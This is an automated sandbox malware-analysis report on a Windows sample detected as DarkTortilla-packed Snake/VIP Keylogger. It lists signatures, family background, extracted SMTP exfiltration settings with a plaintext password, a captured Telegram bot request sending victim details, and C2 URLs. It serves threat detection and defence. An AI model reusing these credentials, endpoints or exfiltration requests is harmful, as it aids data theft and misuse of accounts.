Windows Analysis Report
5qJ6QQTcRS.exe

Overview

General Information

Sample name: 5qJ6QQTcRS.exe
renamed because original name is a hash value
Original sample name: e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c.exe
Analysis ID: 1588845
MD5: 78668d52e5b092184a4b8e6788713b3c
SHA1: 302e6b4b4f6441acbbfe4e55c6f6d8a83d94f7eb
SHA256: e5691b515fc141f456826af6833f83e2c2f950bc8d283dac38b676abe845924c
Tags: exeuser-adrian__luca
Infos:

Detection

DarkTortilla, Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
DarkTortilla DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla
Name Description Attribution Blogpost URLs Link
404 Keylogger, Snake Keylogger Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

barindex
Source: 5qJ6QQTcRS.exe Avira: detected
Source: 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 5qJ6QQTcRS.exe ReversingLabs: Detection: 75%
Source: 5qJ6QQTcRS.exe Virustotal: Detection: 67% Perma Link
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: 5qJ6QQTcRS.exe Joe Sandbox ML: detected

Location Tracking

barindex
Source: unknown DNS query: name: reallyfreegeoip.org
Source: 5qJ6QQTcRS.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49981 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2
Source: 5qJ6QQTcRS.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 00F8F8E9h 4_2_00F8F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 00F8FD41h 4_2_00F8FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05628E28h 4_2_05628B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05627A5Dh 4_2_05627720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05620FF1h 4_2_05620D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562C3D6h 4_2_0562C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056218A1h 4_2_056215F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05626869h 4_2_056265C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05624471h 4_2_056241C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05621449h 4_2_056211A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562E856h 4_2_0562E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562C866h 4_2_0562C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562DF36h 4_2_0562DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562BF46h 4_2_0562BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056202E9h 4_2_05620040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056262DBh 4_2_05626030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then mov esp, ebp 4_2_0562AC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056232B1h 4_2_05623008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05620B99h 4_2_056208F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562E3C6h 4_2_0562E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05620741h 4_2_05620498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562D616h 4_2_0562D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05622A01h 4_2_05622758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562B626h 4_2_0562B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056255D1h 4_2_05625328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562F606h 4_2_0562F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056225A9h 4_2_05622300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562BAB6h 4_2_0562B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562FA96h 4_2_0562F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05625E81h 4_2_05625BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562DAA6h 4_2_0562D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05622E59h 4_2_05622BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05625A29h 4_2_05625780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05627119h 4_2_05626E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05624D21h 4_2_05624A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05621CF9h 4_2_05621A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 056248C9h 4_2_05624620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562CCF6h 4_2_0562CA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05626CC1h 4_2_05626A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562ECE6h 4_2_0562EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05627571h 4_2_056272C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562B196h 4_2_0562AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05625179h 4_2_05624ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 05622151h 4_2_05621EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562F176h 4_2_0562EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 4x nop then jmp 0562D186h 4_2_0562CEB8

Networking

barindex
Source: Network traffic Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.10:49997 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: Yara match File source: 4.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.5qJ6QQTcRS.exe.3a2f6d0.1.raw.unpack, type: UNPACKEDPE
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49980 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49983 -> 158.101.44.242:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49996 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49986 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49990 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49992 -> 104.21.112.1:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49982 -> 104.21.112.1:443
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.10:49981 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20and%20Time:%2011/01/2025%20/%2010:40:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20704672%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Sat, 11 Jan 2025 05:14:45 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672%0D%0ADate%20a
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.0000000003A2F000.00000004.00000800.00020000.00000000.sdmp, 5qJ6QQTcRS.exe, 00000000.00000002.1970037242.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2542240293.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002B33000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: InstallUtil.exe, 00000004.00000002.2549717516.0000000003A71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545353858.0000000002B56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000004.00000002.2545353858.0000000002C3B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
